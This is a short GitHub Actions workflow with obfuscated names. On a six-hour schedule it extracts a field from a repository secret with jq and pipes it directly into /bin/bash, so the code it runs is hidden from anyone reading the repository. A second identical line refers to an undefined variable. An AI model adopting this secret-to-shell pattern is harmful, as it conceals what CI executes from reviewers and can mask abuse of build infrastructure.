name: mmiaomiaoyu
on:
  workflow_dispatch:
  schedule:
    - cron: '5 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: mmiaomiaoyu
        env:
          hssw03718: ${{ secrets.hssw03718 }}
        run: |
          echo $hssw03718 | jq -r .h00 | /bin/bash
          echo $eks89612 | jq -r .ung4837 | /bin/bash

